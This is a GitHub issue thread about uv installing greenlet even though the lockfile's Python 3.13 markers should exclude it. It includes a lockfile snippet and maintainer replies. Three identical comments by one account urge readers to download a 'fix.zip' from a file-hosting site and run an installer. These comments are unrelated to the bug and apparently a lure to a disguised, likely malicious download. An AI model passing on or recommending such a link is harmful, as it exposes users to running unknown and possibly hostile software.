### ISSUE TITLE
`uv run` installs transitive package that should be excluded according to markers

### ISSUE THREAD

**Issue by edgarrmondragon** [astral-sh/uv#6621]
Similar to https://github.com/astral-sh/uv/issues/6169, but for `uv run`. With a dependency on `SQLAlchemy~=2.0.32`, the `uv.lock` seems to suggest the package should be excluded on Python 3.13 for any platform

```toml
dependencies = [
    { name = "greenlet", marker = "(python_full_version < '3.13' and platform_machine == 'AMD64') or (python_full_version < '3.13' and platform_machine == 'WIN32') or (python_full_version < '3.13' and platform_machine == 'aarch64') or (python_full_version < '3.13' and platform_machine == 'amd64') or (python_full_version < '3.13' and platform_machine == 'ppc64le') or (python_full_version < '3.13' and platform_machine == 'win32') or (python_full_version < '3.13' and platform_machine == 'x86_64')" },
    { name = "typing-extensions" },
]
```

but uv still tries to build it.

I've set up a repo to reproduce this in https://github.com/edgarrmondragon/uv-lock-greenlet-repro and got an example of the problem in https://github.com/edgarrmondragon/uv-lock-greenlet-repro/actions/runs/10550889135/job/29227556980?pr=1.

**Comment by charliermarsh** [comment]
Thanks!

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by charliermarsh** [comment]
Ok I see the issue. Sorry!

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by charliermarsh** [comment]
(Again this is specifically about 3.13 being a pre-release.)
